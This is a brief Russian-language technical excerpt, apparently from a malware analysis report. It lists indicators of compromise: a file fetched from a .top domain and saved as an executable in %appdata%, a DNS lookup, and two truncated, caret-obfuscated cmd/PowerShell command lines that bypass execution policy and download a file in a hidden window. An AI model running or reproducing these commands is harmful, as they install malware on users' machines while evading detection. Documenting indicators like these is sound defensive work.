Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^erShE^Ll.exE -^E^xEcUT^I^onP^oLicy bYPaSs ^-No^prOFiL^e -W^In^Dow^St^Y^Le Hidd^eN (n^EW-ObJECT SySTe^M.^nE^t.wEB^cl^ienT).^D^ownl^o^ADfile^(^'http://zofelaseo.top/read.php?f=...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^erShE^Ll.exE -^E^xEcUT^I^onP^oLicy bYPaSs ^-No^prOFiL^e -W^In^Dow^St^Y^Le Hidd^eN (n^EW-ObJECT SySTe^M.^nE^t.wEB^cl^ienT).^D^ownl^o^ADfile^(^'http://zofelaseo.top/read.php?f=...' (со скрытым окном)